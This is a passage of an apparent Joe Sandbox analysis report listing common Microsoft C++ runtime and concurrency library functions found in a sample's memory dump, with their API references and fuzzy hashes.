                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C67B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: ddb02b733c6d0ff641892d81dcb5ed16a0dec45899c5a8e33251fcc3d2851c7f
                                      • Instruction ID: 3d260d0012e21b6c2d86b48f22434257ccc0200899650e80d72be9cd84d2de4d
                                      • Opcode Fuzzy Hash: ddb02b733c6d0ff641892d81dcb5ed16a0dec45899c5a8e33251fcc3d2851c7f
                                      • Instruction Fuzzy Hash: 401102B18402259BCF00EBA8D856BEE77B4BF94720F240409F402A73E2CF349A45C791
                                      Function 0092C535 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C53C
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C546
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C597
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C5B7
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C5D5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: 9594e714a19b7d2b4ffbaaef3fcff9f9045db4bdb7eb1178f5ab8e4043b48e7f
                                      • Instruction ID: 57e370bb0dbc8055e36fa12cab63b09031d7688f8d04e0dd4911d89359b9a88d
                                      • Opcode Fuzzy Hash: 9594e714a19b7d2b4ffbaaef3fcff9f9045db4bdb7eb1178f5ab8e4043b48e7f
                                      • Instruction Fuzzy Hash: FB11A075904224DBCF04EBA4D856FEE77B5AF94320F24040AF401AB2E6CF34EA41CB91
                                      Function 0092C681 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C688
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C692
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C6E3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C703
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C721
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: 9f1c4f61fa326ee8e672f71e3e1d838b9568eda41a650de89a45ab8179c6ad0c
                                      • Instruction ID: a61ac393e7d2726e6864d3114d2b7431861b0c364fd5e11e9fa68ae5ed1d6456
                                      • Opcode Fuzzy Hash: 9f1c4f61fa326ee8e672f71e3e1d838b9568eda41a650de89a45ab8179c6ad0c
                                      • Instruction Fuzzy Hash: B811A0769052259BCF04EBA4DC56BEE77B9AF84720F240509F411A72E1CF749A40CB91
                                      Function 0092C727 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C72E
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C738
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C789
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C7A9
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C7C7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: 14e1adec94edac81b12a1becca98d17bb830b5c17397b8c89047abb358283ec4
                                      • Instruction ID: 89fd7508cb392942f28a1b21327c71126cb8b0fd14eb4125b1de06ad4c2e0664
                                      • Opcode Fuzzy Hash: 14e1adec94edac81b12a1becca98d17bb830b5c17397b8c89047abb358283ec4
                                      • Instruction Fuzzy Hash: 7F110EB19042289BCF04EFA8D846FEE77B8AF84720F240009F401A73E2CF309A40DB91
                                      Function 00938E98 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938E9F
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938EA9
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 00938EFA
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00938F1A
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00938F38
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: 03b750154dfc3abb8e187ac8e7bd8396574ca7552b777cd6faa7977738918e0e
                                      • Instruction ID: 9e6a02424e75e8578ca870b4d9b0c754212ec8003297a587de66ec1c486c19a7
                                      • Opcode Fuzzy Hash: 03b750154dfc3abb8e187ac8e7bd8396574ca7552b777cd6faa7977738918e0e
                                      • Instruction Fuzzy Hash: 2A11AC719042289BCF04EBA4C856BEE77B5AF84320F240409F415AB3E2CF749E45CB91
                                      Function 00938F3E Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00938F45
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00938F4F
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 00938FA0
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00938FC0
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00938FDE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: 6d59241c82411cf6c9971aa2325db05f6e3bc5b7878aa8fcd93ae3990155ed51
                                      • Instruction ID: 735145aa18f5ba8a49dc94478bc2b006a24ef75bb2be79568c2813f7165355ce
                                      • Opcode Fuzzy Hash: 6d59241c82411cf6c9971aa2325db05f6e3bc5b7878aa8fcd93ae3990155ed51
                                      • Instruction Fuzzy Hash: CB117075904225ABCF05FBA4C856BEE77B9AF84720F240409F415A73E1CF749E41DB91
                                      Function 009391D6 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 009391DD
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 009391E7
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 00939238
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00939258
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00939276
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: e927f0ee28342c2acebd57e44b02f09670e46ab11833f5180425b1efebc801af
                                      • Instruction ID: fa993f347667dae2ffa9342c3b76e9efcb36f3f5896742e83ca43edba7dcddf2
                                      • Opcode Fuzzy Hash: e927f0ee28342c2acebd57e44b02f09670e46ab11833f5180425b1efebc801af
                                      • Instruction Fuzzy Hash: 9811C2719046249BCF04EFA4C856BEE77B9BF84720F240409F415AB3D1CF749A40CB91
                                      Function 00939130 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00939137
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00939141
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 00939192
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 009391B2
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009391D0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: b1148b3aa91298e6395617af86bcb88ed99e15528a324aea91af67eaca4ffa19
                                      • Instruction ID: 9c100030686e82271f287ecee1610612dde66527aed80ea6af96138ea52abe9e
                                      • Opcode Fuzzy Hash: b1148b3aa91298e6395617af86bcb88ed99e15528a324aea91af67eaca4ffa19
                                      • Instruction Fuzzy Hash: F111A0719042259BCF04EFA8C856BEE77B9AF84320F240409E415BB3E1CF749E40CB91
                                      Function 00974BFD Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,009661C8,009763D6,?,?,0095833C,?,?,?,?,?,008B1F07,?,?), ref: 00974C02
                                      • _free.LIBCMT ref: 00974C37
                                      • _free.LIBCMT ref: 00974C5E
                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 00974C6B
                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 00974C74
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 74afc88dad0f97907e3946301c8ad8a754ff37bb48ef075fa8c924dee49dcb37
                                      • Instruction ID: 5c01ef96a55a0c5ed0964bafa4982ab42b3073f64d6d933237dd555b9724812f
                                      • Opcode Fuzzy Hash: 74afc88dad0f97907e3946301c8ad8a754ff37bb48ef075fa8c924dee49dcb37
                                      • Instruction Fuzzy Hash: 13017D33146A407782036F795D4AEAF126EEBC1B7072DC426F54CD2193EF788D015121
                                      Function 009484D5 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00943309: TlsGetValue.KERNEL32(?,?,0094274B,00943834,00000000,?,00942729,?,?,?,00000000,?,00000000), ref: 0094330F
                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 009484FF
                                        • Part of subcall function 00952C40: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00952C67
                                        • Part of subcall function 00952C40: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00952C80
                                        • Part of subcall function 00952C40: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00952CF6
                                        • Part of subcall function 00952C40: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00952CFE
                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0094850D
                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00948517
                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00948521
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094853F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                      • String ID:
                                      • API String ID: 4266703842-0
                                      • Opcode ID: e44b77997f5b2cdb476cdcbb2ca627dc7a73014219d5b8302b215514749163c0
                                      • Instruction ID: 947b1da88de09bde09c0ae5383bdbfa98c04253675cd2517c15bf03d9b76acc7
                                      • Opcode Fuzzy Hash: e44b77997f5b2cdb476cdcbb2ca627dc7a73014219d5b8302b215514749163c0
                                      • Instruction Fuzzy Hash: 79F02BB1A0011437CB25FB75D802E6FB7695FD1B14B04005AF80193152DF349E05C7C2
                                      Function 00970A9E Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00970ABC
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 00970ACE
                                      • _free.LIBCMT ref: 00970AE1
                                      • _free.LIBCMT ref: 00970AF2
                                      • _free.LIBCMT ref: 00970B03
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 904fdfa428a723eb72d90d0763198e8f21e3a8561269b6924e10f03ac2abee14
                                      • Instruction ID: 1355bf91686f28a1044c2ec37b9301a4775403feff2e3b5fae2157a7538d05da
                                      • Opcode Fuzzy Hash: 904fdfa428a723eb72d90d0763198e8f21e3a8561269b6924e10f03ac2abee14
                                      • Instruction Fuzzy Hash: B8F0BEB28AAA20DB8B45BF18FD259083BA6F744B2034A8117F41C522B1D7711A81EB84
                                      Function 009114E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 0091159E
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 00911609
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_type_info_name
                                      • String ID: ThisPointer:$ValueNames
                                      • API String ID: 1734802720-2375088429
                                      • Opcode ID: 2334d14611d41c6027e768080081177ffae0da9dd6d754b85b3cd0c4b7d39a92
                                      • Instruction ID: bf9835c14fbb94ddfeb0935437bd2b0402a66611070016a29adaea612f2650c9
                                      • Opcode Fuzzy Hash: 2334d14611d41c6027e768080081177ffae0da9dd6d754b85b3cd0c4b7d39a92
                                      • Instruction Fuzzy Hash: 345129753043486BC7219F249C81EA7BBEAAFD5748B08891DFA8687342E773E948C751
                                      Function 009112F0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 009113AE
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 00911419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_type_info_name
                                      • String ID: ThisPointer:$ValueNames
                                      • API String ID: 1734802720-2375088429
                                      • Opcode ID: 473ec49efa4597c8e96a63fe44f3734e3515c56efe71b2c6ed9bb546125aa2ff
                                      • Instruction ID: 83001f0db5aacbce270158b51fed6b4d41b25397fad5cf08ad5c410e32113d2f
                                      • Opcode Fuzzy Hash: 473ec49efa4597c8e96a63fe44f3734e3515c56efe71b2c6ed9bb546125aa2ff
                                      • Instruction Fuzzy Hash: 875149313043447BC7219F24CC81BA7BBEAAF85B08B04885DFA9987752EB32E949C751
                                      Function 0097C0DB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • _strpbrk.LIBCMT ref: 0097C12A
                                      • _free.LIBCMT ref: 0097C247
                                        • Part of subcall function 0096595F: IsProcessorFeaturePresent.KERNEL32(00000017,00965931,?,?,008B1F07,?,?,00000016,?,?,0096593E,00000000,00000000,00000000,00000000,00000000), ref: 00965961
                                        • Part of subcall function 0096595F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00965983
                                        • Part of subcall function 0096595F: TerminateProcess.KERNEL32(00000000), ref: 0096598A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                      • String ID: *?$.
                                      • API String ID: 2812119850-3972193922
